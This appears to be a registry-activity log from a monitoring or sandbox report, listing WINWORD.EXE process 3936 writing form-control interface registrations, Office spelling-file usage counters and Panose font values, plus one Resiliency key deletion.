WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLTextArea

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}

LabelControlEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}

CommandButtonEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}

MdcTextEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}

MdcListEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}

MdcComboEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}

MdcCheckBoxEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}

MdcOptionButtonEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}

MdcToggleButtonEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}

ScrollbarEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}

TabStripEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}

SpinbuttonEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}

ImageEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}

WHTMLControlEvents

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents1

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents2

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents3

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents4

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents5

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents6

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents7

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents9

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents10

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}

IPage

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}

Pages

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}

IMultiPage

3936

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}

MultiPageEvents

3936

WINWORD.EXE

delete key

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1333919805

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1333919806

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1333919805

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1333919806

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1333919842

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1333919843

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10061400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1046

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10061400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1046

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10031400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1043

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10031400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1043

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1333919757

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1333919758

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10010400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1025

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10010400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1025

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10001400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1040

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10001400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1040

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10022400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1058

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10022400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1058

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10091400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1049

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10091400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1049

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10065400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1110

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10065400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1110

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100D2400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1069

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100D2400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1069

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10030400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1027

1333919751

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10030400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1027

1333919752

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

SpellingAndGrammarFilesExp6_1042

1333919745

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

StemmerFiles_1042

1333919746

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100F1400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1055

1333919745

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100F1400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1055

1333919746

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1333919807

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1333919808

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1333919807

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1333919808

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1333919844

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1333919845

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1333919759

3936

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1333919760

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Arial

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Courier New

02070309020205020404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Symbol

05050102010706020507

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Wingdings

05000000000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Batang

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

SimSun

02010600030101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

PMingLiU

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Dotum

020B0600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

SimHei

02010609060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MingLiU

02020509000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gulim

020B0600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Century

02040604050505020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Angsana New

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Cordia New

020B0304020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Mangal

02040503050203030202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Latha

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Sylfaen

010A0502050306030303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Vrinda

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Raavi

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Shruti

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gautami

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Tunga

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Estrangelo Edessa

03080600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Cambria Math

02040503050406030204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Arial Unicode MS

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Tahoma

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Marlett

00000000000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Batang

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

BatangChe

02030609000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@BatangChe

02030609000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gungsuh

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Gungsuh

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

GungsuhChe

02030609000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@GungsuhChe

02030609000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

DaunPenh

01010101010101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

DokChampa

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Euphemia

020B0503040102020104

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Vani

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Gulim

020B0600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

GulimChe

020B0609000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@GulimChe

020B0609000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Dotum

020B0600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

DotumChe

020B0609000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@DotumChe

020B0609000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Impact

020B0806030902050204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Iskoola Pota

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Kalinga

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Kartika

02020503030404060203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Khmer UI

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lao UI

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lucida Console

020B0609040504020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Malgun Gothic

020B0503020000020004

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Malgun Gothic

020B0503020000020004

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Meiryo

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Meiryo

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Meiryo UI

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Meiryo UI

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft Himalaya

01010100010101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft JhengHei

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Microsoft JhengHei

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft YaHei

020B0503020204020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Microsoft YaHei

020B0503020204020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MingLiU

02020509000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@PMingLiU

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MingLiU_HKSCS

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MingLiU_HKSCS

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MingLiU-ExtB

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MingLiU-ExtB

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

PMingLiU-ExtB

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@PMingLiU-ExtB

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MingLiU_HKSCS-ExtB

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MingLiU_HKSCS-ExtB

02020500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Mongolian Baiti

03000500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MS Gothic

020B0609070205080204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MS PGothic

020B0600070205080204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MS PGothic

020B0600070205080204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MS UI Gothic

020B0600070205080204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MS UI Gothic

020B0600070205080204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MS Mincho

02020609040205080304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MS PMincho

02020600040205080304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MS PMincho

02020600040205080304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MV Boli

02000500030200090000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft New Tai Lue

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Nyala

02000504070300020003

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft PhagsPa

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Plantagenet Cherokee

02020602070100000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Segoe Script

020B0504020000000003

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Segoe UI

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Segoe UI Semibold

020B0702040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Segoe UI Light

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Segoe UI Symbol

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@SimSun

02010600030101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

NSimSun

02010609030101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@NSimSun

02010609030101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

SimSun-ExtB

02010609060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@SimSun-ExtB

02010609060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft Tai Le

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Shonar Bangla

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft Yi Baiti

03000500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft Sans Serif

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Aparajita

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Ebrima

02000000000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gisha

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Kokila

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Leelawadee

020B0502040204020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Microsoft Uighur

02000000000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MoolBoran

020B0100010101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Utsaah

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Vijaya

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Andalus

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Arabic Typesetting

03020402040406030203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Simplified Arabic

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Simplified Arabic Fixed

02070309020205020404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Sakkal Majalla

02000000000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Traditional Arabic

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Aharoni

02010803020104030203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

David

020E0502060401010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

FrankRuehl

020E0503060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Levenim MT

02010502060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Miriam

020B0502050101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Miriam Fixed

020B0509050101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Narkisim

020E0502050101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Rod

02030509050101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

FangSong

02010609060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@FangSong

02010609060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@SimHei

02010609060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

KaiTi

02010609060101010101

3936

WINWORD.EXE

write

